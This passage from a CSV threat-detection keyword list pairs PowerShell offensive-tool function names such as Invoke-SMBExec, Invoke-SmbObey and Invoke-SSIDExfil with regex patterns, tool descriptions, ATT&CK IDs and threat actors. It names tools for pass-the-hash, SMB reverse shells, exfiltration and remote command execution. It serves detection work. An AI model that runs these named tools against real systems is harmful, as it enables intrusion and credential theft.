"*Invoke-SMBEnum*",".{0,1000}Invoke\-SMBEnum.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","1","N/A","10","10","1407","299","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" "*Invoke-SMBEnum*",".{0,1000}Invoke\-SMBEnum.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*invoke-smbexec *",".{0,1000}invoke\-smbexec\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Invoke-SMBExec*",".{0,1000}Invoke\-SMBExec.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-SMBExec*",".{0,1000}Invoke\-SMBExec.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","10","10","1407","299","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" "*Invoke-SMBExec*",".{0,1000}Invoke\-SMBExec.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-SMBExec.ps1*",".{0,1000}Invoke\-SMBExec\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-SMBExec.ps1*",".{0,1000}Invoke\-SMBExec\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1093","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*invoke-smblogin *",".{0,1000}invoke\-smblogin\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Invoke-SMBNegotiate -ComputerName localhost*",".{0,1000}Invoke\-SMBNegotiate\s\-ComputerName\slocalhost.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-SMBNegotiate*",".{0,1000}Invoke\-SMBNegotiate.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-SmbObey *",".{0,1000}Invoke\-SmbObey\s.{0,1000}","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","0","N/A","10","10","13","0","2024-02-17T12:20:01Z","2022-01-16T21:02:14Z" "*Invoke-SmbObey.*",".{0,1000}Invoke\-SmbObey\..{0,1000}","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","1","N/A","10","10","13","0","2024-02-17T12:20:01Z","2022-01-16T21:02:14Z" "*Invoke-SmbOrder *",".{0,1000}Invoke\-SmbOrder\s.{0,1000}","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","0","N/A","10","10","13","0","2024-02-17T12:20:01Z","2022-01-16T21:02:14Z" "*Invoke-SmbOrder.*",".{0,1000}Invoke\-SmbOrder\..{0,1000}","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","1","N/A","10","10","13","0","2024-02-17T12:20:01Z","2022-01-16T21:02:14Z" "*Invoke-SMBRemoting*",".{0,1000}Invoke\-SMBRemoting.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*Invoke-SMBRemoting.ps1*",".{0,1000}Invoke\-SMBRemoting\.ps1.{0,1000}","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","1","N/A","9","1","29","9","2024-05-01T13:42:06Z","2023-09-06T16:00:47Z" "*Invoke-SMBRemoting-main*",".{0,1000}Invoke\-SMBRemoting\-main.{0,1000}","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","1","N/A","9","1","29","9","2024-05-01T13:42:06Z","2023-09-06T16:00:47Z" "*Invoke-SMBScanner*",".{0,1000}Invoke\-SMBScanner.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SmbScanner.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-SmbScanner*",".{0,1000}Invoke\-SmbScanner.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SmbScanner.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-SmbScanner*",".{0,1000}Invoke\-SmbScanner.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1080","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-Snaffler*",".{0,1000}Invoke\-Snaffler.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-Snaffler*",".{0,1000}Invoke\-Snaffler.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*invoke-sniffer *",".{0,1000}invoke\-sniffer\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Invoke-SocksProxy *",".{0,1000}Invoke\-SocksProxy\s.{0,1000}","offensive_tool_keyword","Invoke-SocksProxy","Socks proxy - and reverse socks server using powershell.","T1090 - T1021.001 - T1021.002","TA0002","N/A","N/A","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","0","N/A","10","10","767","169","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z" "*Invoke-SocksProxy*",".{0,1000}Invoke\-SocksProxy.{0,1000}","offensive_tool_keyword","Invoke-SocksProxy","Creates a local or reverse Socks proxy using powershell","T1090 - T1573 - T1059 - T1021","TA0002 - TA0011 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/p3nt4/Invoke-SocksProxy","1","0","N/A","N/A","10","767","169","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z" "*Invoke-SocksProxy.*",".{0,1000}Invoke\-SocksProxy\..{0,1000}","offensive_tool_keyword","Invoke-SocksProxy","Socks proxy - and reverse socks server using powershell.","T1090 - T1021.001 - T1021.002","TA0002","N/A","N/A","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","1","N/A","10","10","767","169","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z" "*Invoke-SocksProxy.ps1*",".{0,1000}Invoke\-SocksProxy\.ps1.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","10","1","N/A","N/A","N/A","N/A" "*Invoke-Spoolsample*",".{0,1000}Invoke\-Spoolsample.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SpoolSample*",".{0,1000}Invoke\-SpoolSample.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-SprayEmptyPassword*",".{0,1000}Invoke\-SprayEmptyPassword.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-SQLAudit*",".{0,1000}Invoke\-SQLAudit.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Scan for MSSQL misconfigurations to escalate to System Admin","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://stealthbits.com/blog/compromise-powerupsql-sql-attacks/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Invoke-SQLAudit*",".{0,1000}Invoke\-SQLAudit.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-SQLDumpInfo*",".{0,1000}Invoke\-SQLDumpInfo.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-SQLOSCmd -Instance * -Command *",".{0,1000}Invoke\-SQLOSCmd\s\-Instance\s.{0,1000}\s\-Command\s.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Run command (enables XP_CMDSHELL automatically if required)","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Invoke-SQLOSCmd.ps1*",".{0,1000}Invoke\-SQLOSCmd\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SQLOSCmd.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-SQLOSCmd.ps1*",".{0,1000}Invoke\-SQLOSCmd\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1096","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-SQLUncPathInjection*",".{0,1000}Invoke\-SQLUncPathInjection.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-SSHCommand.ps1*",".{0,1000}Invoke\-SSHCommand\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1094","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-SSIDExfil*",".{0,1000}Invoke\-SSIDExfil.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-SSIDExfil*",".{0,1000}Invoke\-SSIDExfil.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-StandIn.*",".{0,1000}Invoke\-StandIn\..{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*invokestealthuserhunter*",".{0,1000}invokestealthuserhunter.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - 